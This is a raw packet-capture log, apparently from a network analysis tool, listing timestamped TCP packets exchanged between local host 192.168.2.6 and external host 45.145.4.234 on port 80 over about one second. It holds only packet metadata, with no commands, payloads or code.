                                                                                                                                                Oct 6, 2024 22:18:48.936455965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936465979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936471939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936479092 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936501026 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936518908 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936542034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936579943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936695099 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936706066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936717033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936728001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936733961 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936738968 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936750889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936752081 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936762094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936773062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936778069 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936784029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936795950 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936796904 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936821938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936840057 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.936909914 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936919928 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.936954021 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937001944 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937012911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937021971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937031984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937038898 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937041998 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937052965 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937062979 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937068939 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937093019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937227964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937237978 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937252045 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937269926 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937283993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937385082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937396049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937406063 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937416077 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937426090 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937431097 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937437057 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937448025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937458038 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937458038 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937470913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937478065 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937494993 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937521935 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937705040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937714100 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937724113 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937733889 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937742949 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937743902 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937757969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937768936 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937781096 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937783003 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937789917 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937794924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937805891 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937818050 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937819004 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937829018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.937843084 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.937865019 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938009977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938020945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938030958 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938040018 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938045025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938064098 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938072920 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938081980 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938091040 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938095093 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938108921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938114882 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938122034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938131094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938148975 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938159943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938339949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938353062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938361883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938383102 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938406944 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938484907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938498020 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938513041 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938524008 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938529015 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938539028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938549995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938555956 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938561916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938571930 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938571930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938585043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938596010 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938599110 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938606977 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938617945 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938625097 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938628912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938642025 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938644886 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938654900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938664913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938666105 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938677073 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938688040 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938693047 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938699961 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.938718081 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.938734055 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939279079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939290047 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939301014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939311028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939315081 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939322948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939332962 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939343929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939346075 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939353943 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939356089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939373016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939374924 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939392090 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939395905 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939408064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939416885 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939416885 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939431906 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939435005 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939445972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939448118 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939456940 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939464092 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939470053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939480066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939490080 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939491987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939502001 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939507961 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939512014 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939522982 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939522982 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939533949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939544916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939552069 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939555883 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939567089 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939578056 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939580917 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939589024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939595938 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939599991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.939611912 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.939636946 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.940097094 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.940109015 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.940119028 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.940129995 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.940134048 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.940144062 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.940156937 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:48.940164089 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:48.940190077 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023056984 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023102999 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023114920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023128033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023140907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023139000 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023192883 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023217916 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023241043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023252964 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023263931 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023289919 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023308992 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023314953 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023325920 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023338079 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023350954 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023361921 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023366928 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023375034 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023397923 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023420095 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023521900 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023629904 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023678064 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023690939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023701906 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023714066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023725033 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023732901 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023737907 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023761988 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023787022 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023847103 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023859024 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023869991 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023881912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023893118 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023894072 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023906946 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023917913 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023924112 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023931026 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.023937941 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023960114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.023981094 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024127007 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024137974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024148941 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024162054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024173975 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024177074 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024200916 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024213076 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024322987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024337053 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024348974 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024358988 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024370909 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024382114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024383068 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024396896 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024408102 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024410963 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024420023 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024432898 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024435043 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024442911 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024447918 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024475098 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024497032 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024636030 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024646997 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024657011 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024669886 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024679899 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024687052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024693012 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024698019 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024698973 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024720907 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024728060 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024739981 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024744034 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024750948 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024763107 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024768114 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024775982 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024786949 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024797916 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024801016 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024811029 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024822950 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.024836063 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024857044 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.024873972 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025187969 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025201082 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025212049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025223970 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025237083 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025271893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025271893 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025286913 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025356054 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025368929 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025381088 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025387049 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025393009 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025399923 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025404930 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025418043 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025435925 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025468111 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025645971 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025659084 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025670052 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025695086 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025727987 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025835037 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025847912 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025856972 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025867939 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025880098 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025885105 CEST6388580192.168.2.645.145.4.234
                                                                                                                                                Oct 6, 2024 22:18:49.025891066 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025902987 CEST806388545.145.4.234192.168.2.6
                                                                                                                                                Oct 6, 2024 22:18:49.025913954 CEST806388545.145.4.234192.168.2.6
